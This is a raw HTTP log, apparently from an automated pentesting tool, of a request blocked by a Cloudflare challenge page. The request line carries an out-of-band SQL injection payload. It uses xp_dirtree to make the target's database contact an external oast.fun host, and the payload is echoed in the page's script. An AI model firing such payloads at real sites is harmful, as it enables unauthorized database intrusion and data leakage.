REQUEST:
GET https://my.myfirst.tech/search?id=%27%3B%20EXEC%20master..xp_dirtree%20%27%5C%5Ch0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%5Ca%27%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9612
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84742996da110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=hLpcn1Q5dQkWk5f1Sa1%2Be%2FYoOreqidH2qmL5oNHRAUKtr89Xmqb5Gyd1R59LtDy757uEdGsi4A%2BcIwUe49lew%2BVhE9uS%2B4RZuLX%2B0A9omOYuqpi%2FgoIi3pU7aMwI5j%2Bwkw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84742996da110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'G4lY_hGQMk4weHe59tavFlx2p.rkfOKbWJa7wTSGr2c-1784281154-1.2.1.1-4Fk3yQmI8wJtkxRb3xZkkjceRSUA3UsgJ0F6JHz3kYGtCmTfU48p6IB0UqRUb1n6',cITimeS: '1784281154',cRay: 'a1c84742996da110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?id=%27%3B+EXEC+master..xp_dirtree+%27%5C%5Ch0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%5Ca%27%3B--+-\u0026__cf_chl_tk=5c5YJl7yUmcRJrdp3Ss1jLz6gZPt3XyupB8oal9ppSs-1784281154-1.0.1.1-Wp5hUe9KTLvkHrTrB35msYId.waStZEbCjfQxKmdw1Y",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?id=%27%3B+EXEC+master..xp_dirtree+%27%5C%5Ch0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%5Ca%27%3B--+-\u0026__cf_chl_f_tk=5c5YJl7yUmcRJrdp3Ss1jLz6gZPt3XyupB8oal9ppSs-1784281154-1.0.1.1-Wp5hUe9KTLvkHrTrB35msYId.waStZEbCjfQxKmdw1Y",md: 'jRg.CaHwFxwwg2wCM1vvZdKtyhAWwOPW8n4CcLOuz_U-1784281154-1.2.1.1-WMknsgqeBqjeKBJ7sIYZkNfAJc_RBV45ybBNvs3CYbnfbDdiGmkEqQ3pTSaiwShfpkhgmk6wAROCD24FdHXLdFdzS3RfzRs15K7f1YUPnLVgm8fHblPKlq9ae_zvzj4L_tVEjm.f_tyub7mIzKaQKOo286GsSFZnayrv8I58s4g72SIF5CF2qhYTbkYVoh6ftLzYZXiNoloK4JRoSSEiLmGW9ZYaOrQmrt9tJ4E6zP09Wu8nMG9tr4yUias8hBzFM1PjCveAuYCfzh2eMMnSXn1Vc8vBsUxHebnVMXDgsMOvt0p_9fEwkLEZ.clWTr7rducO4RbOlQvpRkMd1dg2mkBxwlh2IZ87ZOxn6nB.9w8luwSUUuzoxPELHHjBAuEZTymTVqwY4uGASMz3HwrIAq63E3EAARUhYOAgV.Jfea8sTPjXJMD5yXTvL0RYDZ34TANjXTh3putQNBMwLnRXgfPy.bNlprMzUfSgwlpvNzSJG7DTPExSnUOHKO0UQdu_wGKkp7dsFHMwPZVz0EheJwEISCc946mBc8yJVa4i44L.WAZwNrGeAOwy4aFcMUAvA83zztPyD4lIH6_FS2bb4QOy9V8NtzxW9hgK86ZkeCP4jgPeunz97X9RDdfBRO.TtzXVUuktJcITp11Nj1eYmYHOlTdnKxZGT9H7Oep4aYR3.a7gVnDrSID0EfOYx76jmftjnJm2g.VJBcbz8UOGRcYBNZzHcSngLS614BdaXWCEGhSXaYsFxfZoiIuUeM4tHaBYrPUBTURv6waEO7FkCKOaMPBjVOyjC.XZqzhTiboujyloPUuhm29ttCpXUd9HjxZaaJpiihHXyS951DiQssHRMw2VTUT_CHyHsvKji4INC_YbQeCsfH.UtjzhAbVhOZlX01yvhshSNbpi6TYjoXH9Hokc25fuR3TLla1lizntz958LE63CxOsiaI0wSrkBa7bDFcGEK36T6aJTk8SaYj_9GE8LM4bTP6z0FcIL._HgwsjzVZepeJmNb5Y.axMnyJBYb4a_EdL7PqSjTX6.aph.37IkRsm6LqDGucORTw5OKP9BP27xumXWt13RoCR6C.tf95ajoJNDUCkzzMJ.QtEwlwQIQXfQ2SxCwamlGv29aq2q95UP26J4ALzJR9cggGI0WsI_IGMFJwu9C4DfoPMIuBul9NAFl4KmOgxvor0T_0DsiWagpnEBxUJxpgS4x4DsguxgQjSoSDugaj3Rid3kCTwADwmnWOF3qBQivBY_BOO_Dxunf3fJUaNx46n',mdrd: '4Qt0tMvNM4xA3Lz8RBewHBeJSJD_hHUaPsQZ1KtS2Ys-1784281154-1.2.1.1-BabU.T33cp8AEFnY1Wj6740QHx_QsWBPhKoBM7JvYuTYhipnNxdJB9SO4bKsdGvv2eZdj7cDVBGTtcg09DNFlEojXiNnv_5AW_x7u96utKOk7LzigaIG_FgTtjZ.i_QhLh6ietcwuNcenHDwYdItNa0UEfjK3NE.oqMgsxx13jx1ZAAv2KPyDRGMrTI63naBpPacPheiNXG_J4uptylft2qN.qqvnTiFNYZMCv.g7pZEOIweGcGHKkfZ5Vkw_TKk',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84742996da110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?id=%27%3B+EXEC+master..xp_dirtree+%27%5C%5Ch0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%5Ca%27%3B--+-\u0026__cf_chl_rt_tk=5c5YJl7yUmcRJrdp3Ss1jLz6gZPt3XyupB8oal9ppSs-1784281154-1.0.1.1-Wp5hUe9KTLvkHrTrB35msYId.waStZEbCjfQxKmdw1Y"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
